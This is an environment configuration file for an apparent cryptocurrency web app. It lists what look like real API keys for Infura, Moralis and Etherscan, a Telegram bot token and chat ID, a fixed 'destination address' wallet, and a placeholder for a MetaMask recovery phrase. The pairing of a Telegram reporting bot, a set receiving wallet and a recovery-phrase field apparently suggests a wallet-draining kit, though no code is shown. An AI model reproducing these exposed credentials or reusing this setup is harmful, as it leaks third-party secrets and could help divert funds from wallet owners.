# ETHSCAN_API = 'T7SEE65KX2U1N2YS9F5JM7VSNUJX4PGW6J';
VITE_PROJECT_ID = "0e82a2042e9b6e7c12a66c93606876c2"
VITE_INFURA_API_KEY = "80b2d59155ae4aed890387b5819b07fd"
MNEMONIC = "<Your-MetaMask-Secret-Recovery-Phrase>"
VITE_MORALIS_API ='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJub25jZSI6IjY4Y2UwNWE5LTM2OTYtNDBlYy04MWRhLWRmYThhY2RiYWVmNiIsIm9yZ0lkIjoiMzYzNDg4IiwidXNlcklkIjoiMzczNTcwIiwidHlwZUlkIjoiNjUzNGU4OGItNTdjNy00NTA1LTgzY2UtY2FiNjk4YjAwMDczIiwidHlwZSI6IlBST0pFQ1QiLCJpYXQiOjE2OTkyNDY4MjAsImV4cCI6NDg1NTAwNjgyMH0.wplUwvMZIf1NN7lHBHjsU0IPVX7ocoDzfLGsK3avN3Y'
VITE_TELEGRAM_BOT_API_KEY = '5858343744:AAHaowZLWptD3hpdleB5yz1vgdhIgFzZriE'
VITE_TELEGRAM_CHAT_ID = '2031327961'
VITE_DESTINATION_ADDRESS ='0x413D485430F18Aa758AD34122Aa792E9d4a33A0C'